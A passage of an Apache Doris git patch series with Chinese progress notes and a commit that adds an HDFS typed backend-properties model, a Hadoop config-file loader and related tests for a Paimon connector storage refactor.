收口。 - 2026-06-17 **P1-T04 ✅**(paimon `PaimonScanPlanProvider` BE 静态凭据全量切 `getStorageProperties().toBackendProperties().ifPresent(putAll(toMap()))`→`location.*`;vended 不动、叠后保序):现场 recon 揪出 **DV-002 未覆盖的 HDFS 缺口**——fe-filesystem 无 HDFS typed BE model(`HdfsFileSystemProvider.bind` 抛→`bindAll` 跳过),legacy `getBackendStorageProperties()` 经 fe-core 发的 HDFS `hadoop/dfs/HA/kerberos`→`THdfsParams` 是 load-bearing,全量切会丢→HDFS paimon 原生读回归;`getBackendStorageProperties()` 是 ConnectorContext 方法不依赖 fe-property→P1-T05 不需此切换,纯 D-003 统一。**用户定全量切 + 接受 HDFS 回归 + follow-up 补 HDFS typed BE 类**(DV-004/R-007/FU-T01)。TDD RED(`expected ak was null`)→GREEN;52/0 + 全模块 292/0/1skip + checkstyle 0 + import-gate PASS + 白名单干净(2 文件)。**对抗 review `wf_09745716-d48`**(10 agent)confirm 4:MAJOR=R-008(OSS/COS/OBS typed 缺 `AWS_CREDENTIALS_PROVIDER_TYPE` ANONYMOUS,fe-filesystem 超白名单→FU-T02,仅无凭据 catalog)+ 3 test-gap 已修(新增 Optional.empty 跳过 + 多 entry merge 测试);推翻 3 假 finding(含实测 mutation 证「测试钉了新 seam」)。⚠️ docker e2e 未跑。 - 2026-06-17 **P1-T03 ✅**(commit `[P1-T03]`;连接器侧首个 task;paimon `applyStorageConfig` 改走 `ctx.getStorageProperties().toHadoopConfigurationMap()`):recon 证 ctx 在 `PaimonConnector.createCatalog()` 可达 → `buildStorageHadoopConfig()` 合并下发;保留 paimon.*/raw 覆盖 last-write-wins。**T1 = Option C**(用户选;fe-filesystem 对象存储 impl 是运行时插件不在单测 classpath → paimon UT 只钉 connector-local 契约,真等价由 docker P1-T06 兜底;DV-003)。TDD RED(neuter forEach → 3 测红)→GREEN;删 ~23 canonical 测试(fe-filesystem 职责)+ 6 新契约测试;**292/0/0/1skip + checkstyle 0 + import-gate PASS + 白名单干净**。**对抗 review `wf_76df09a4-c2f`** 推翻假 1B+2M、confirm 1M=**R-006**(调优默认 50/3000/1000、100/10000/10000 fe-filesystem 无显式 UT 守护;功能正确,docker 兜底,fe-filesystem 加断言 follow-up 超白名单)。⚠️ docker e2e 未跑。 - 2026-06-17 **P1-T02 ✅**(`DefaultConnectorContext.getStorageProperties()` + `FileSystemFactory.bindAllStorageProperties`,D-009 二次确认 3 文件):TDD 4 绿(factory 委托/fallback + ctx 空/全量绑定捕获 raw map)+ 回归 2 绿;checkstyle 0;raw map 经 `getOrigProps()` 取。**fe-core 侧管线打通**。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 66f99b1943b2ba..5c7dee6d864a29 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -65,10 +65,12 @@ - **对抗 review(`wf_09745716-d48`,10 agent,3 lens + verify)**:7 finding,confirm 4。**(1) MAJOR=R-008**(fe-filesystem OSS/COS/OBS typed BE map 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`,无凭据 catalog 的 legacy `ANONYMOUS` 丢失;**fix 在 fe-filesystem 超白名单**→记 R-008 + **follow-up FU-T02**,仅影响无 ak/sk 的 OSS/COS/OBS);**(2) MINOR→已修**(fake 恒 `Optional.of` 漏 `.ifPresent` 空分支→新增上述测试覆盖);**(3) NIT→已修**(多 entry merge 未测→同测试覆盖);**(4) NIT→已修**(非空 ctx+空 list→同测试覆盖)。verify 推翻 3 假 finding(AWS_BUCKET/ROOT_PATH 超集=DV-002 已接受非回归;「测试没钉新 seam」被**实测 mutation 推翻**——回退旧 seam→RED;OverlaysVended 静态缺失由 sibling NormalizesStaticCreds 覆盖)。 - ⚠️ **docker e2e 未跑**(真等价 Option C 闸在 P1-T06;HDFS flavor 会暴露 R-007、无凭据 OSS/COS/OBS 暴露 R-008,均**已接受、非新 bug**)。 -### P1-T05 ⬜ 断开 paimon → fe-property 依赖边 -- **做什么**:删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖 + `PaimonCatalogFactory:20` 的 import。 -- **验收**:`grep -r 'org.apache.doris.property' fe/fe-connector/fe-connector-paimon/src` == 0;模块编译通过。**fe-property 模块本身不删**(变 0 消费者孤儿)。 +### P1-T05 ✅ 断开 paimon → fe-property 依赖边(2026-06-17,仅删 pom 边 + grep 闸,293/0/1skip + checkstyle 0) +- **做什么**:删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖块(comment + dependency,原 :67-74)。**import/call 已在 P1-T03 删(DV-003-b),故 P1-T05 退化为仅删 pom 边**。**fe-property 模块本身不删**(D-005,变 0 消费者孤儿)。 +- **验收**:`grep -r 'org.apache.doris.property' fe/fe-connector/fe-connector-paimon/src` == 0;模块编译 + 全 UT 通过。 - **依赖**:P1-T03, P1-T04。设计 §4 P1-5 / §0.1。 +- **现场 recon 结论(2026-06-17,对照真实代码)**:`grep org.apache.doris.property` 在 paimon src(main + test)**已 ZERO**(DV-003-b 已清 import/call);唯一 `fe-property` 物理耦合 = pom :72 依赖块;其余 `fe-property` 字样均为**历史注释**(PaimonCatalogFactory :348/:384/:591、PaimonConnector :132/:204、test :382/:542 描述「替代 legacy fe-property 路」),不依赖 classpath、准确记录历史 → **不动**(surgical)。无 test-scope/transitive 用途。 +- **完成态(2026-06-17)**:删 pom :67-74(fe-property comment + dependency 块),**仅改 `fe-connector-paimon/pom.xml` 1 文件**。**RED/GREEN = 构建闸**(无 UT 可写):删后**全模块编译 + 全 UT 仍绿 = 证无隐藏 transitive 依赖断裂**(paimon 现仅依赖 `fe-connector-{api,spi}` + `fe-filesystem-api` + `fe-thrift(provided)` + paimon SDK + hive-shade)。验证:paimon 全模块 **293/0/0/1skip**(含 P1-T04 新增 1 测试;docker-gated PaimonLiveConnectivityTest)、`grep org.apache.doris.property src` == 0、`fe-property` 在 paimon pom 已无、checkstyle 0、import-gate PASS、白名单干净(仅 pom 1 文件)。**P1 storage 收口的依赖边正式断开**(paimon 不再依赖 fe-property,变孤儿模块——本次不物理删,D-005)。⚠️ docker e2e 未跑。 ### P1-T06 ⬜ P1 验证 - **做什么**:paimon UT 全绿;docker `enablePaimonTest=true` 5 flavor;T1 等价性测试。 From a426648f209f0b43ce98e0c531c96f735057f327 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 03:38:09 +0800 Subject: [PATCH 084/128] [FU-T01] fe-filesystem-hdfs: HDFS typed BE model restores HDFS BE keys (R-007) P1-T04 switched paimon's BE static-credential path fully to the typed getStorageProperties().toBackendProperties().toMap() seam, but fe-filesystem had no HDFS typed BE model (HdfsFileSystemProvider.bind() threw -> bindAll skipped it), so HDFS-warehouse catalogs lost their hadoop/dfs/HA/kerberos BE keys -> THdfsParams (DV-004 / R-007). Add HdfsFileSystemProperties (FileSystemProperties + BackendStorageProperties, BE-only) whose toMap() faithfully ports legacy HdfsProperties.initBackendConfigProperties() (parity by construction with the fe-property twin) + HdfsConfigFileLoader for hadoop.config.resources XML. Re-type HdfsFileSystemProvider with bind()/create(P); create(Map)/supports() unchanged (zero regression to the hive/iceberg/broker FE filesystem + create()-side Kerberos path). Kerberos = BE-key string emission only (K1: no fe-kerberos, create()-side authenticator untouched). F1: bridge Config.hadoop_config_dir to the leaf via a system property set in FileSystemFactory.bindAllStorageProperties. Verify: fe-filesystem-hdfs 78/0 (25 new golden parity tests; existing DFSFileSystemTest 25/0 = create() path intact), checkstyle 0, RED/GREEN by mutation, fe-core -am compile clean. Adversarial review wf_5db99e32-2ad (27 agents): parity/packaging/scope cleared; fixed malformed-uri fail-loud + 2 stale comments + 11 tests. docker e2e NOT run (HA/kerberized HDFS flavor at P1-T06). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 8 +- .../apache/doris/fs/FileSystemFactory.java | 4 + .../doris/fs/FileSystemPluginManager.java | 8 +- fe/fe-filesystem/fe-filesystem-hdfs/pom.xml | 12 + .../filesystem/hdfs/HdfsConfigFileLoader.java | 105 +++++ .../hdfs/HdfsFileSystemProperties.java | 340 +++++++++++++++ .../hdfs/HdfsFileSystemProvider.java | 15 +- .../hdfs/HdfsFileSystemPropertiesTest.java | 387 ++++++++++++++++++ .../metastore-storage-refactor/HANDOFF.md | 72 ++-- .../metastore-storage-refactor/PROGRESS.md | 4 +- .../metastore-storage-refactor/WORKFLOW.md | 1 + .../decisions-log.md | 12 + plan-doc/metastore-storage-refactor/risks.md | 2 +- plan-doc/metastore-storage-refactor/tasks.md | 11 +- 14 files changed, 928 insertions(+), 53 deletions(-) create mode 100644 fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java create mode 100644 fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java create mode 100644 fe/fe-filesystem/fe-filesystem-hdfs/src/test/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemPropertiesTest.java diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index d865a8d81d3539..63987ab341c7e0 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -606,10 +606,10 @@ public Map getScanNodeProperties( // Hadoop config (P1-T03) and its BE creds from the SAME typed source (design D-003). Empty when no // context (offline unit tests) → no storage props emitted (never the broken raw aliases). // - // KNOWN GAP 1 (DV-004 / R-007): fe-filesystem has no typed HDFS BE model yet (HdfsFileSystemProvider - // throws on bind), so an HDFS-warehouse catalog yields NO entry here → the legacy hadoop/dfs/HA/ - // kerberos keys that became THdfsParams are dropped, regressing HDFS-backed paimon native reads. - // Accepted by the user pending a follow-up that adds fe-filesystem HdfsFileSystemProperties. + // HDFS (DV-004 / R-007 — CLOSED by FU-T01): fe-filesystem now has a typed HDFS BE model + // (HdfsFileSystemProperties); HdfsFileSystemProvider.bind() yields it, so an HDFS-warehouse catalog + // emits the hadoop/dfs/HA/kerberos keys here (→ THdfsParams) at parity with the legacy path + // (hadoop.config.resources resolved under the operator-configured Config.hadoop_config_dir). // KNOWN GAP 2 (R-008): the typed OSS/COS/OBS models omit AWS_CREDENTIALS_PROVIDER_TYPE, which legacy // emitted as ANONYMOUS for credential-less catalogs — a fe-filesystem parity gap (out of P1 whitelist), // tracked as a follow-up; only affects OSS/COS/OBS catalogs with no static ak/sk. diff --git a/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemFactory.java b/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemFactory.java index 6800aecdfadddb..cc236a9fabc1b3 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemFactory.java +++ b/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemFactory.java @@ -118,6 +118,10 @@ public static org.apache.doris.filesystem.FileSystem getFileSystem(Map bindAllStorageProperties( Map properties) { + // Bridge the operator-configured hadoop config dir to filesystem plugins: a plugin leaf cannot import + // fe-core Config, so the HDFS plugin's config-resource loader reads this system property instead. Keep + // the key in sync with HdfsConfigFileLoader.CONFIG_DIR_PROPERTY ("doris.hadoop.config.dir"). + System.setProperty("doris.hadoop.config.dir", Config.hadoop_config_dir); FileSystemPluginManager mgr = pluginManager; if (mgr != null) { return mgr.bindAll(properties); diff --git a/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemPluginManager.java b/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemPluginManager.java index 90a8810a2cb939..b9269f27103f30 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemPluginManager.java +++ b/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemPluginManager.java @@ -147,11 +147,13 @@ public FileSystem createFileSystem(Map properties) throws IOExce * more than one backend (e.g. an object store plus HDFS) yields one entry per backend. * *

      Providers not yet migrated to typed binding (their {@link FileSystemProvider#bind(Map)} - * still throws {@link UnsupportedOperationException}: HDFS / broker / local) are skipped — they + * still throws {@link UnsupportedOperationException}: broker / local) are skipped — they * contribute no typed {@code StorageProperties} (the connector handles those backends via raw * {@code fs.}/{@code dfs.}/{@code hadoop.} passthrough), matching the legacy object-store-only - * Hadoop config helper. Returns an empty list when nothing matches. Binding/validation errors - * from a migrated provider propagate (fail-loud), mirroring legacy {@code createAll}. + * Hadoop config helper. (HDFS is migrated: it binds a typed BE model whose {@code toBackendProperties()} + * re-emits the {@code hadoop./dfs./HA/kerberos} backend keys — FU-T01.) Returns an empty list when + * nothing matches. Binding/validation errors from a migrated provider propagate (fail-loud), + * mirroring legacy {@code createAll}. */ public List bindAll(Map properties) { List result = new ArrayList<>(); diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/pom.xml b/fe/fe-filesystem/fe-filesystem-hdfs/pom.xml index a7ff85ea10958d..49695c80c832d4 100644 --- a/fe/fe-filesystem/fe-filesystem-hdfs/pom.xml +++ b/fe/fe-filesystem/fe-filesystem-hdfs/pom.xml @@ -41,6 +41,18 @@ under the License. ${revision} + + + org.apache.doris + fe-foundation + ${revision} + + + + org.apache.commons + commons-lang3 + + org.apache.hadoop hadoop-client diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java new file mode 100644 index 00000000000000..b3fd8c79864106 --- /dev/null +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java @@ -0,0 +1,105 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.filesystem.hdfs; + +import org.apache.commons.lang3.StringUtils; +import org.apache.hadoop.conf.Configuration; +import org.apache.hadoop.fs.Path; + +import java.io.File; +import java.util.HashMap; +import java.util.Map; + +/** + * Loads Hadoop XML configuration files (e.g. {@code hdfs-site.xml} / {@code core-site.xml}) referenced by the + * {@code hadoop.config.resources} property into a key-value map. This mirrors the legacy fe-core + * {@code CatalogConfigFileUtils.loadConfigurationFromHadoopConfDir} (and its fe-property port + * {@code PropertyConfigLoader}) but lives in fe-filesystem-hdfs so the module stays a leaf that does not + * depend on fe-core / fe-common. + * + *

      The base directory under which the named resource files are resolved is computed by + * {@link #resolveHadoopConfigDir()}: the operator-configured {@code Config.hadoop_config_dir}, bridged in via + * the {@link #CONFIG_DIR_PROPERTY} system property (a plugin leaf cannot import fe-core {@code Config}), with a + * {@code $DORIS_HOME/plugins/hadoop_conf/} fallback that matches {@code Config.hadoop_config_dir}'s own default. + * hadoop-client is already on this module's classpath, so the Configuration parsing needs no extra dependency. + */ +public final class HdfsConfigFileLoader { + + /** + * System property the engine sets to {@code Config.hadoop_config_dir} so this plugin leaf resolves + * {@code hadoop.config.resources} files under the operator-configured directory. fe-core + * {@code FileSystemFactory.bindAllStorageProperties} sets it before binding; keep the key in sync there. + */ + public static final String CONFIG_DIR_PROPERTY = "doris.hadoop.config.dir"; + + /** + * Optional explicit override (used by tests). When blank, the directory is resolved from + * {@link #CONFIG_DIR_PROPERTY}, falling back to {@code $DORIS_HOME/plugins/hadoop_conf/}. + */ + public static volatile String hadoopConfigDirOverride = null; + + private HdfsConfigFileLoader() { + } + + static String resolveHadoopConfigDir() { + if (StringUtils.isNotBlank(hadoopConfigDirOverride)) { + return hadoopConfigDirOverride; + } + String fromEngine = System.getProperty(CONFIG_DIR_PROPERTY); + if (StringUtils.isNotBlank(fromEngine)) { + return fromEngine; + } + String home = System.getenv("DORIS_HOME"); + if (StringUtils.isBlank(home)) { + home = System.getProperty("doris.home", ""); + } + return home + "/plugins/hadoop_conf/"; + } + + /** + * Loads the comma-separated config files (each resolved under {@link #hadoopConfigDir}) and returns all + * resolved Hadoop configuration entries as a mutable map. Returns an empty map when {@code resourcesPath} + * is blank. The underlying {@link Configuration} is created with Hadoop's defaults loaded, matching the + * legacy behavior (the BE receives the full resolved set). + * + * @param resourcesPath comma-separated list of config file names; may be blank + * @return a mutable map of the loaded Hadoop configuration entries (never null) + * @throws IllegalArgumentException if a referenced file is missing + */ + public static Map loadConfigMap(String resourcesPath) { + Map confMap = new HashMap<>(); + if (StringUtils.isBlank(resourcesPath)) { + return confMap; + } + Configuration conf = new Configuration(); + String baseDir = resolveHadoopConfigDir(); + for (String resource : resourcesPath.split(",")) { + String resourcePath = baseDir + resource.trim(); + File file = new File(resourcePath); + if (file.exists() && file.isFile()) { + conf.addResource(new Path(file.toURI())); + } else { + throw new IllegalArgumentException("Config resource file does not exist: " + resourcePath); + } + } + for (Map.Entry entry : conf) { + confMap.put(entry.getKey(), entry.getValue()); + } + return confMap; + } +} diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java new file mode 100644 index 00000000000000..9daacdd9c49c21 --- /dev/null +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java @@ -0,0 +1,340 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.filesystem.hdfs; + +import org.apache.doris.filesystem.FileSystemType; +import org.apache.doris.filesystem.properties.BackendStorageKind; +import org.apache.doris.filesystem.properties.BackendStorageProperties; +import org.apache.doris.filesystem.properties.FileSystemProperties; +import org.apache.doris.filesystem.properties.StorageKind; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; + +import org.apache.commons.lang3.StringUtils; + +import java.lang.reflect.Field; +import java.net.URI; +import java.util.ArrayList; +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; +import java.util.Set; + +/** + * Provider-owned typed properties for HDFS / HDFS-compatible filesystems (hdfs, viewfs, ofs, jfs, oss-hdfs). + * + *

      This is the typed backend model for HDFS: it implements {@link BackendStorageProperties} so the + * typed pipeline ({@code ConnectorContext.getStorageProperties().toBackendProperties().toMap()}) can + * re-produce the HDFS backend key set ({@code fs.defaultFS}, {@code dfs.*} HA, {@code hadoop.security.*} + * + Kerberos principal/keytab, {@code hadoop.username}, ...) that the BE turns into {@code THdfsParams}. + * Without it the typed path returns nothing for HDFS-warehouse catalogs (see DV-004 / R-007). + * + *

      The backend key set is a faithful port of the legacy fe-core + * {@code org.apache.doris.datasource.property.storage.HdfsProperties.getBackendConfigProperties()} (whose + * dependency-light twin is fe-property {@code HdfsProperties}) so the new typed path and the legacy path + * stay at parity. + * + *

      Scope note: this model deliberately does NOT implement {@code HadoopStorageProperties}. The + * FE-side Hadoop {@link org.apache.hadoop.conf.Configuration} used to actually open an HDFS file system is + * still built by {@link HdfsConfigBuilder} on the {@link HdfsFileSystemProvider#create(Map)} path, and the + * real {@code UGI.doAs} stays in fe-core/ctx. This class emits only the neutral BE key strings; Kerberos + * here is BE-key emission only, no authenticator is built (K1). + */ +public final class HdfsFileSystemProperties implements FileSystemProperties, BackendStorageProperties { + + public static final String HDFS_DEFAULT_FS_NAME = "fs.defaultFS"; + + private static final String AUTH_KERBEROS = "kerberos"; + private static final String DFS_NAME_SERVICES_KEY = "dfs.nameservices"; + private static final String URI_KEY = "uri"; + + // URI schemes recognized when deriving fs.defaultFS from a 'uri' property (parity with legacy supportSchema). + private static final Set URI_SCHEMES = Set.of("hdfs", "viewfs", "jfs"); + + // HA keys, inlined from org.apache.hadoop.hdfs.client.HdfsClientConfigKeys to avoid a hadoop-hdfs + // dependency (these are stable, well-known HDFS HA configuration keys). + private static final String DFS_HA_NAMENODES_KEY_PREFIX = "dfs.ha.namenodes"; + private static final String DFS_NAMENODE_RPC_ADDRESS_KEY = "dfs.namenode.rpc-address"; + private static final String DFS_HA_FAILOVER_PROXY_PROVIDER_KEY_PREFIX = "dfs.client.failover.proxy.provider"; + + @ConnectorProperty(names = {"hdfs.authentication.type", "hadoop.security.authentication"}, + required = false, + description = "The authentication type of HDFS. The default value is 'simple'.") + private String hdfsAuthenticationType = "simple"; + + @ConnectorProperty(names = {"hdfs.authentication.kerberos.principal", "hadoop.kerberos.principal"}, + required = false, + description = "The principal of the kerberos authentication.") + private String hdfsKerberosPrincipal = ""; + + @ConnectorProperty(names = {"hdfs.authentication.kerberos.keytab", "hadoop.kerberos.keytab"}, + required = false, + description = "The keytab of the kerberos authentication.") + private String hdfsKerberosKeytab = ""; + + @ConnectorProperty(names = {"hadoop.username"}, + required = false, + description = "The username of Hadoop. Doris will use this user to access HDFS.") + private String hadoopUsername = ""; + + @ConnectorProperty(names = {"hdfs.impersonation.enabled"}, + required = false, + supported = false, + description = "Whether to enable the impersonation of HDFS.") + private boolean hdfsImpersonationEnabled = false; + + @ConnectorProperty(names = {"ipc.client.fallback-to-simple-auth-allowed"}, + required = false, + description = "Whether to allow fallback to simple authentication.") + private String allowFallbackToSimpleAuth = ""; + + @ConnectorProperty(names = {"fs.defaultFS"}, required = false, description = "The default file system URI.") + private String fsDefaultFS = ""; + + @ConnectorProperty(names = {"hadoop.config.resources"}, + required = false, + description = "The xml files of Hadoop configuration.") + private String hadoopConfigResources = ""; + + private final Map rawProperties; + private final Map matchedProperties; + private final Map backendConfigProperties; + + private HdfsFileSystemProperties(Map rawProperties) { + this.rawProperties = Collections.unmodifiableMap(new HashMap<>(rawProperties)); + this.matchedProperties = Collections.unmodifiableMap(collectMatchedProperties(rawProperties)); + ConnectorPropertiesUtils.bindConnectorProperties(this, rawProperties); + if (StringUtils.isBlank(fsDefaultFS)) { + this.fsDefaultFS = extractDefaultFsFromUri(rawProperties); + } + this.backendConfigProperties = + Collections.unmodifiableMap(buildBackendConfigProperties(rawProperties)); + } + + /** Binds and validates raw properties. */ + public static HdfsFileSystemProperties of(Map properties) { + HdfsFileSystemProperties props = new HdfsFileSystemProperties(properties); + props.validate(); + return props; + } + + @Override + public void validate() { + // Parity with legacy HdfsProperties.checkRequiredProperties(): kerberos requires principal + keytab. + if (isKerberos() + && (StringUtils.isBlank(hdfsKerberosPrincipal) || StringUtils.isBlank(hdfsKerberosKeytab))) { + throw new IllegalArgumentException( + "HDFS authentication type is kerberos, but principal or keytab is not set."); + } + checkHaConfig(backendConfigProperties); + } + + @Override + public String providerName() { + return "HDFS"; + } + + @Override + public StorageKind kind() { + return StorageKind.HDFS_COMPATIBLE; + } + + @Override + public FileSystemType type() { + return FileSystemType.HDFS; + } + + @Override + public Map rawProperties() { + return rawProperties; + } + + @Override + public Map matchedProperties() { + return matchedProperties; + } + + @Override + public Optional toBackendProperties() { + return Optional.of(this); + } + + @Override + public BackendStorageKind backendKind() { + return BackendStorageKind.HDFS; + } + + @Override + public Map toMap() { + return backendConfigProperties; + } + + public boolean isKerberos() { + return AUTH_KERBEROS.equalsIgnoreCase(hdfsAuthenticationType); + } + + /** + * Builds the backend configuration key set. Faithful port of legacy + * {@code HdfsProperties.initBackendConfigProperties()} so the typed BE map stays at parity with fe-core + * {@code getBackendConfigProperties()}. Overlay order (last-write-wins): config-resource XML files, then + * the {@code hadoop./dfs./fs./juicefs.} pass-through from the raw map, then the synthesized keys. + */ + private Map buildBackendConfigProperties(Map origProps) { + Map props = HdfsConfigFileLoader.loadConfigMap(hadoopConfigResources); + Map userOverridden = extractUserOverriddenHdfsConfig(origProps); + if (!userOverridden.isEmpty()) { + props.putAll(userOverridden); + } + if (StringUtils.isNotBlank(fsDefaultFS)) { + props.put(HDFS_DEFAULT_FS_NAME, fsDefaultFS); + } + if (StringUtils.isNotBlank(allowFallbackToSimpleAuth)) { + props.put("ipc.client.fallback-to-simple-auth-allowed", allowFallbackToSimpleAuth); + } else { + props.put("ipc.client.fallback-to-simple-auth-allowed", "true"); + } + props.put("hdfs.security.authentication", hdfsAuthenticationType); + if (isKerberos()) { + props.put("hadoop.security.authentication", AUTH_KERBEROS); + props.put("hadoop.kerberos.principal", hdfsKerberosPrincipal); + props.put("hadoop.kerberos.keytab", hdfsKerberosKeytab); + } + if (StringUtils.isNotBlank(hadoopUsername)) { + props.put("hadoop.username", hadoopUsername); + } + return props; + } + + private static Map extractUserOverriddenHdfsConfig(Map origProps) { + Map overridden = new HashMap<>(); + if (origProps == null || origProps.isEmpty()) { + return overridden; + } + origProps.forEach((key, value) -> { + if (key.startsWith("hadoop.") || key.startsWith("dfs.") || key.startsWith("fs.") + || key.startsWith("juicefs.")) { + overridden.put(key, value); + } + }); + return overridden; + } + + // ---- helpers ported from fe HdfsPropertiesUtils (kept local; single-use) ---- + + private static String extractDefaultFsFromUri(Map props) { + String uriStr = getSingleUri(props); + if (StringUtils.isBlank(uriStr)) { + return ""; + } + // Parity with legacy HdfsPropertiesUtils.extractDefaultFsFromUri: URI.create is unguarded, so a + // malformed uri fails loud at bind/catalog-create rather than silently dropping fs.defaultFS. + URI uri = URI.create(uriStr); + String scheme = uri.getScheme(); + if (scheme == null || !URI_SCHEMES.contains(scheme.toLowerCase())) { + return ""; + } + return scheme + "://" + uri.getAuthority(); + } + + private static String getSingleUri(Map props) { + String uriValue = props.entrySet().stream() + .filter(e -> e.getKey().equalsIgnoreCase(URI_KEY)) + .map(Map.Entry::getValue) + .filter(StringUtils::isNotBlank) + .findFirst() + .orElse(null); + if (uriValue == null) { + return null; + } + // HDFS fs.defaultFS only supports a single URI; a comma-separated list is not a usable default. + if (uriValue.split(",").length > 1) { + return null; + } + return uriValue; + } + + /** + * Validates HDFS HA configuration. Port of legacy {@code HdfsPropertiesUtils.checkHaConfig}: when + * {@code dfs.nameservices} is present, each nameservice must declare at least two namenodes, an + * rpc-address per namenode, and a failover proxy provider. Validates only; adds no keys. + */ + private static void checkHaConfig(Map hdfsProperties) { + if (hdfsProperties == null) { + return; + } + String dfsNameservices = hdfsProperties.getOrDefault(DFS_NAME_SERVICES_KEY, ""); + if (StringUtils.isBlank(dfsNameservices)) { + // No nameservice configured => HA is not enabled, nothing to validate. + return; + } + for (String dfsservice : splitAndTrim(dfsNameservices)) { + String haNnKey = DFS_HA_NAMENODES_KEY_PREFIX + "." + dfsservice; + String namenodes = hdfsProperties.getOrDefault(haNnKey, ""); + if (StringUtils.isBlank(namenodes)) { + throw new IllegalArgumentException("Missing property: " + haNnKey); + } + List names = splitAndTrim(namenodes); + if (names.size() < 2) { + throw new IllegalArgumentException("HA requires at least 2 namenodes for service: " + dfsservice); + } + for (String name : names) { + String rpcKey = DFS_NAMENODE_RPC_ADDRESS_KEY + "." + dfsservice + "." + name; + if (StringUtils.isBlank(hdfsProperties.getOrDefault(rpcKey, ""))) { + throw new IllegalArgumentException( + "Missing property: " + rpcKey + " (expected format: host:port)"); + } + } + String failoverKey = DFS_HA_FAILOVER_PROXY_PROVIDER_KEY_PREFIX + "." + dfsservice; + if (StringUtils.isBlank(hdfsProperties.getOrDefault(failoverKey, ""))) { + throw new IllegalArgumentException("Missing property: " + failoverKey); + } + } + } + + private static List splitAndTrim(String s) { + List result = new ArrayList<>(); + if (StringUtils.isBlank(s)) { + return result; + } + for (String token : s.split(",")) { + String trimmed = token.trim(); + if (!trimmed.isEmpty()) { + result.add(trimmed); + } + } + return result; + } + + private static Map collectMatchedProperties(Map rawProperties) { + Map matched = new HashMap<>(); + for (Field field : ConnectorPropertiesUtils.getConnectorProperties(HdfsFileSystemProperties.class)) { + String matchedName = ConnectorPropertiesUtils.getMatchedPropertyName(field, rawProperties); + if (StringUtils.isNotBlank(matchedName)) { + matched.put(matchedName, rawProperties.get(matchedName)); + } + } + return matched; + } + + @Override + public String toString() { + return ConnectorPropertiesUtils.toMaskedString(this); + } +} diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProvider.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProvider.java index 62e50015f7a55e..e97b0fefb066d9 100644 --- a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProvider.java +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProvider.java @@ -18,7 +18,6 @@ package org.apache.doris.filesystem.hdfs; import 